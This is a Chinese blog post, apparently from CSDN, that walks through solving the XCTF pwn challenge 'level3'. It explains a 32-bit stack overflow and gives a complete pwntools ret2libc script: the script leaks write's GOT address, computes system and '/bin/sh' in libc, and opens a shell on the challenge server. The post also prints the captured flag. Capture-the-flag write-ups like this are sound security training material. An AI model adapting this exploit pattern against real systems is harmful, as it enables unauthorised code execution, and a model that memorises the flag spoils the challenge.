[攻防世界]level3

最新推荐文章于 2022-11-05 11:29:54 发布
最新推荐文章于 2022-11-05 11:29:54 发布
阅读量354 收藏 1
点赞数
分类专栏: # 攻防世界 PWN 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125334800
版权

[攻防世界]level3

解题

分析

checksec一下,发现是一个32位并且开启了NX。
在这里插入图片描述
拖入ida中,main函数开始分析。
在这里插入图片描述
这里有个函数,进去看一下是什么,在根据运行的进行看。
运行的时候,运行的第一句话是Input:,之后随意输入一些数据,显示的是Hello,World!
在这里插入图片描述
那么返回到汇编进行查看,也基本可以看懂,从main函数开始,跳转到了vulnerable_function函数里面,之后输出第一个Input:下面有一个buf,可以看看能不能从buf入手。
获得到了buf的栈空间是0x88,之后为了覆盖返回地址,所以要+0x04.
在这里插入图片描述在这里插入图片描述
之后查看字符串,发现没有给system和/bin/sh,但是给了一个libc.so.6,附件中也给了一个libc_32.so.6那么大概知道了,这个考点是libc泄露,那么两个库定下来了,一个是LibcSearcher和pwn库,利用ROP来查看一下位置,我发现一个问题,我用LibcSearcher没发现我的版本,那么我就用最开始的那种写法,但是LibcSearcher的写法我都注释上了。

脚本

from pwn import *
from LibcSearcher import *
#加载
#p = process('./level3')
p = remote('111.200.241.244',52250)
context(os = 'linux',arch = 'i386',log_level = 'debug')
#gdb.attach(p)
elf = ELF('level3')
lib = ELF('libc_32.so.6')
#got plt
write_a = elf.sym['write']
main_a = elf.sym['main']
got_write = elf.got['write']
plt_write = elf.plt['write']
libc_write = lib.sym['write']
lib_sys = lib.sym['system']
lib_bin = 0x0015902b
#第一次
payload_a = b'a'*(0x88+0x04) + p32(write_a) + p32(main_a) + p32(1) + p32(got_write) + p32(4)
#print('payload_a:' + payload_a)
p.recvline()
p.sendline(payload_a)
write_got=u32(p.recv()[:4])

#在第一次中获得
#libc = LibcSearcher('write',write_got)
#libc_b = write_got - libc.dump('write')
#system_a = libc_b+ libc.dump('system')
#binsh_a = libc_b + libc.dump('str_bin_sh')
libc = write_got - libc_write
sys_a = libc + lib_sys
_bin_sh = libc + lib_bin
#第二次
payload_b = b'a'*(0x88+0x04) + p32(sys_a) + p32(1) + p32(_bin_sh)
p.recvline()
p.sendline(payload_b)
p.interactive()

最后获得flag是cyberpeace{e983ea909cd634b95bb4650cd47ff818}

在这里插入图片描述

逆向萌新
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【ctf】xctf攻防世界level3!!
elsa________的博客
04-05 1553
level3题解: 首先,检查一下程序基本信息: 程序很简单,保护开的也差不多。但是需要注意,这道题单独给出了libc,而且根据题目提示,程序中没有现成的system函数。这就需要我们从libc中动态加载system函数。 初步思路:PIE没有开启,那么在libc中函数的offset就是固定的,只要确认了libc的base address,然后计算出system函数的offset,就可以定位...
攻防世界pwn新手区题解-level3
weixin_62621015的博客
04-17 805
攻防世界pwn-level3详细题解。
攻防世界新——level3
weixin_62675330的博客
02-10 1397
攻防世界 – pwn新手区 level3 由题意可得可能跟libc有关。 ps:libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 引申: glibc 和 libc 都是 Linux 下的 C 函数库。 libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。 1.checksec查看保护 文件有两个,一个是elf文件,一个是so文件。 ps:so文件(shared object),so文件是
攻防世界pwn——level3
qq_62076255的博客
11-05 596
攻防世界pwn——level3
攻防世界-level3-Writeup
SkYe's Blog
05-15 479
level3 [collapse title=“展开查看详情” status=“false”] 考点:栈溢出、ROP(ret2libc) ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] write(1, "Input:\n", 7u); return read(0, &buf, 0x100u); //溢出 } 打开了 NX 保护栈数据不可执行,程序没有预留后门。解决办法就是 ret2libc ,这
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952541
level3
qq_44832048的博客
07-26 2281
level 3 在终端中输入file level3 查看为32位, checksec level3命令,发现栈是不受保护, 在IDA中查看伪代码, 很明显的栈溢出漏洞,但是没有system函数和/bin/sh字符串,只有一个write函数,泄露函数got表中的地址获取到库中某个函数的真正加载地址,通过偏移找出函数的库,通过然后找出其他函数的真正加载地址,包括system函数也包括...
攻防世界Level3
WangLal的博客
07-05 286
攻防世界PWN新手题 level3的WP 基本三步:checksec,file,执行文件 只开了NX防护,且是个32位的文件 放进IDA中查看 main函数中只调用了一个函数,vulnerable_function(),进入函数中查看 发现read函数可以制造栈溢出漏洞。 要注意,题目还给了一个库,level3的文件中没有System函数,所以只能调用库中的函数。同时,文件PIE没开代表libc中函数的编移量就是固定的,只要确认了libc的基址,然后计算出system函数的offset,就可以定位到s
攻防世界 level3
BengDouLove的博客
03-26 501
整个程序就这么几行代码, vul函数里有明显栈溢出,猜测是覆盖返回地址为system,,,但是程序里没有system也没有binsh,所以只能自己泄露 查一查write函数,三个参数,第一个为1代表输出,第二个是要输出东西的指针,第三个是输出长度 所以可以利用wirte,把第二个参数改为某个libc里面函数的地址,泄露出来,然后根据偏移得到system和binsh 但是只有一个read函数并不...
攻防世界pwn-level3】
a_silly_coder的博客
02-17 3253
下载文件后首先查看保护,发现可以进行栈溢出攻击 将文件拖入32位ida 进入vulnerable_function后,发现了read处有栈溢出漏洞 在查看代码后,发现没有提供system和bin/sh,但是由于给了libc,所以可以找到libc的偏移量,然后计算出system和bin/sh的加载地址。 对于plt表,got表,实际加载地址,我是这么理解的:通过elf.plt['write']获取到的是write在plt表中的地址1,这个地址1上存放的实际内容是write在got表的地..
攻防世界 新手区 level3
winterze的博客
04-04 384
分享一位师傅写得,很详细,对我们小白很有帮助 https://www.cnblogs.com/cloud-tree/p/11929585.html 攻防世界 新手区 level3 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stac...
攻防世界——pwn(3)
weixin_44319142的博客
04-11 851
guess_num seed和rand的知识点就是一个伪生成随机数的东西要用ctypes倒入这个库才能用rand 理一下思路,利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了 exp from pwn import * from ctypes import * #倒入了可以去找libc库 context.log_level = 'debug' p =...
攻防世界 三 (进阶篇)
sjt670994562的博客
06-09 1028
CRACKME 这一道题对OD的使用进行了一定的训练,虽然相比真真正的使用还是差很多,首先是一个注册问题的exe文件,有窗口,打开OD寻找messagebox。 尝试设置断点 然后尝试打开软件点击注册,发现到了断点,说明断成功了。然后这时候看栈口,会发现之前压进来的数据有失败的提示字面,说明我们没有到判断正误的界面找到最下面的提示字面的地址,跳转,发现函数,设置断点 再次运行,然后发现不行...
攻防世界pwn(4)
weixin_44319142的博客
04-12 639
int_overflow level3
攻防世界 unserialize3
最新发布
08-16
攻防世界中,unserialize3 可能是指 PHP 序列化和反序列化的第三个版本。序化是将对象转换为字节流过程,而反序列化则是将字节流转换回对象的过程。这些功能在 PHP 中通过 serialize() 和 unserialize() 函数实现。 然而,unserialize3 并不是真实存在的 PHP 序列化版本。PHP 中的序列化和反序列化过程并没有明确的版本号,而是根据 PHP 解释器的版本和相关扩展来决定其行为。 如果你有关于 unserialize3 的具体问题或上下文,我可以帮助你更详细地回答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值